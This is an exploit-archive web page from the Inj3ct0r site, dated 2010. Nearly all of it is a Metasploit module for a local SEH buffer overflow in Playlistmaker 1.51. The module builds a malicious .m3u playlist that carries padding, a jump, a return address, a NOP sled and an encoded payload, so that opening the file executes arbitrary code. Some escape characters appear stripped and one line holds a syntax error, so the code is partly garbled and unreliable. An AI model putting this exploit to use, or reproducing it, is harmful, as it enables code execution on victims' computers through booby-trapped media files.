Playlistmaker version 1.51 Local Buffer Overflow Exploit (SE
Posted on 08 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Playlistmaker version 1.51 Local Buffer Overflow Exploit (SEH) META </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================== Playlistmaker version 1.51 Local Buffer Overflow Exploit (SEH) META =================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Playlistmaker version 1.51 Local Buffer Overflow Exploit (SEH)', 'Description' => %q{ This module exploits a local buffer overflow and an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'Sid3^effects ', 'Version' => 'Version 1', 'References' => [ [ 'OSVDB', '' ], [ 'URL', 'http://www.exploit-db.com/exploits/9466' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 4488, 'BadChars' => "x00x20x0ax0d", 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', { 'Ret' => => 0x10020ed7} ], ], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'boomm3u.m3u']), ], self.class) end def exploit sploit = "Playlistmaker version 1.51" sploit << rand_text_alphanumeric(992) sploit << "xEBx09x90x90" # short jump 6 bytes sploit << [target.ret].pack('V') sploit << "x90" * 20 # nop sled sploit << payload.encoded sploit << rand_text_alphanumeric(5088 - payload.encoded.length) boomm3u = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(boomm3u) end end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
